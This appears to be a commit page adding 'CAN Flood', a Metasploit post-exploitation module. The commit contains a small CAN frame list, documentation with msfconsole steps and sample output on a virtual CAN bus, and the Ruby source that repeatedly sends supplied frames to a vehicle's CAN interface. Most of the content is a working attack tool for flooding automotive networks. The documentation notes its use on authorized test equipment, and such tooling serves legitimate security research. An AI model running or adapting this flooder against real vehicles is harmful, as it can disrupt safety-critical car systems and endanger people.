Land #11595, can_flood post module
William Vu
commit
5867158238
|
|
@ -0,0 +1,4 @@
|
||||||
|
244+0000009999
|
||||||
|
188+030000
|
||||||
|
19b+00000F
|
||||||
|
19b+000010
|
||||||
|
|
@ -0,0 +1,77 @@
|
||||||
|
## Introduction
|
||||||
|
|
||||||
|
CAN Flood is a post-exploitation module that floods a CAN interface for a number of rounds. Both the interface and the number of rounds are to be provided as inputs. An example list of frames also is part of the inputs, and sources the flooding at each round. The module therefore is general as it is parametric in the frame list.
|
||||||
|
|
||||||
|
## Verification Steps
|
||||||
|
|
||||||
|
First, start up a virtual CAN bus:
|
||||||
|
|
||||||
|
1. `sudo modprobe can`
|
||||||
|
2. `sudo modprobe vcan`
|
||||||
|
3. `sudo ip link add dev vcan0 type vcan`
|
||||||
|
4. `sudo ip link set up vcan0`
|
||||||
|
|
||||||
|
Then do the thing:
|
||||||
|
|
||||||
|
5. Start `msfconsole`
|
||||||
|
6. `use auxiliary/server/local_hwbridge`
|
||||||
|
7. `set uripath trycanbus`
|
||||||
|
8. `run`
|
||||||
|
9. `use auxiliary/client/hwbridge/connect`
|
||||||
|
10. `set targeturi trycanbus`
|
||||||
|
11. `run`
|
||||||
|
12. `use post/hardware/automotive/can_flood`
|
||||||
|
13. `set canbus vcan0`
|
||||||
|
14. `set session 1`
|
||||||
|
15. `run`
|
||||||
|
|
||||||
|
## Options
|
||||||
|
|
||||||
|
**CANBUS**
|
||||||
|
Determines which CAN interface to use.
|
||||||
|
|
||||||
|
**FRAMELIST**
|
||||||
|
Path of the file that contains the list of frames. Default is "/usr/share/metasploit-framework/data/wordlists/can_flood_frames.txt".
|
||||||
|
|
||||||
|
**ROUNDS**
|
||||||
|
Number of executed rounds. Default is 200.
|
||||||
|
|
||||||
|
**SESSION**
|
||||||
|
The session to run this module on.
|
||||||
|
|
||||||
|
## Scenarios
|
||||||
|
|
||||||
|
The user must know a list of frames that generate an effect on the car. This is because the module is general as it is parametric in the frame list.
|
||||||
|
You can test the module by setting a virtual CAN interface and then execute the commands, thus obtaining the underlying output:
|
||||||
|
|
||||||
|
```
|
||||||
|
msf5 > use auxiliary/server/local_hwbridge
|
||||||
|
msf5 auxiliary(server/local_hwbridge) > run
|
||||||
|
[*] Auxiliary module running as background job 0.
|
||||||
|
|
||||||
|
[*] Using URL: http://0.0.0.0:8080/trycanbus
|
||||||
|
[*] Local IP: http://10.0.2.15:8080/trycanbus
|
||||||
|
[*] Server started.
|
||||||
|
msf5 auxiliary(server/local_hwbridge) > use auxiliary/client/hwbridge/connect
|
||||||
|
msf5 auxiliary(client/hwbridge/connect) > set targeturi trycanbus
|
||||||
|
targeturi => trycanbus
|
||||||
|
msf5 auxiliary(client/hwbridge/connect) > run
|
||||||
|
|
||||||
|
[*] Attempting to connect to 127.0.0.1...
|
||||||
|
[*] Hardware bridge interface session 1 opened (127.0.0.1 -> 127.0.0.1) at 2019-03-20 03:17:55 -0400
|
||||||
|
[+] HWBridge session established
|
||||||
|
[*] HW Specialty: {"automotive"=>true} Capabilities: {"can"=>true, "custom_methods"=>true}
|
||||||
|
[!] NOTICE: You are about to leave the matrix. All actions performed on this hardware bridge
|
||||||
|
[!] could have real world consequences. Use this module in a controlled testing
|
||||||
|
[!] environment and with equipment you are authorized to perform testing on.
|
||||||
|
[*] Auxiliary module execution completed
|
||||||
|
msf5 auxiliary(client/hwbridge/connect) > use post/hardware/automotive/can_flood
|
||||||
|
msf5 post(hardware/automotive/can_flood) > set canbus vcan0
|
||||||
|
canbus => vcan0
|
||||||
|
msf5 post(hardware/automotive/can_flood) > set session 1
|
||||||
|
session => 1
|
||||||
|
msf5 post(hardware/automotive/can_flood) > run
|
||||||
|
|
||||||
|
[*] -- FLOODING --
|
||||||
|
[*] Post module execution completed
|
||||||
|
```
|
||||||
|
|
@ -0,0 +1,42 @@
|
||||||
|
##
|
||||||
|
# This module requires Metasploit: https://metasploit.com/download
|
||||||
|
# Current source: https://github.com/rapid7/metasploit-framework
|
||||||
|
##
|
||||||
|
|
||||||
|
class MetasploitModule < Msf::Post
|
||||||
|
|
||||||
|
DEFAULT_FRAMELIST = File.join(Msf::Config.data_directory, 'wordlists', 'can_flood_frames.txt')
|
||||||
|
|
||||||
|
def initialize(info = {})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => 'CAN Flood',
|
||||||
|
'Description' => 'This module floods a CAN interface with supplied frames.',
|
||||||
|
'Author' => 'Pietro Biondi',
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Platform' => 'hardware',
|
||||||
|
'SessionTypes' => ['hwbridge']
|
||||||
|
))
|
||||||
|
|
||||||
|
register_options([
|
||||||
|
OptString.new('CANBUS', [true, 'CAN interface']),
|
||||||
|
OptString.new('FRAMELIST', [true, 'Path to frame list file', DEFAULT_FRAMELIST]),
|
||||||
|
OptInt.new('ROUNDS', [true, 'Number of executed rounds', 200])
|
||||||
|
])
|
||||||
|
end
|
||||||
|
|
||||||
|
def run
|
||||||
|
unless File.exist?(datastore['FRAMELIST'])
|
||||||
|
print_error("Frame list file '#{datastore['FRAMELIST']}' does not exist")
|
||||||
|
return
|
||||||
|
end
|
||||||
|
|
||||||
|
vprint_status("Reading frame list file: #{datastore['FRAMELIST']}")
|
||||||
|
frames = File.readlines(datastore['FRAMELIST']).map { |line| line.strip.split('+') }
|
||||||
|
|
||||||
|
print_status(' -- FLOODING -- ')
|
||||||
|
datastore['ROUNDS'].times do
|
||||||
|
frames.each { |frame| client.automotive.cansend(datastore['CANBUS'], frame[0], frame[1]) }
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
end
|
||||||
Loading…
Reference in New Issue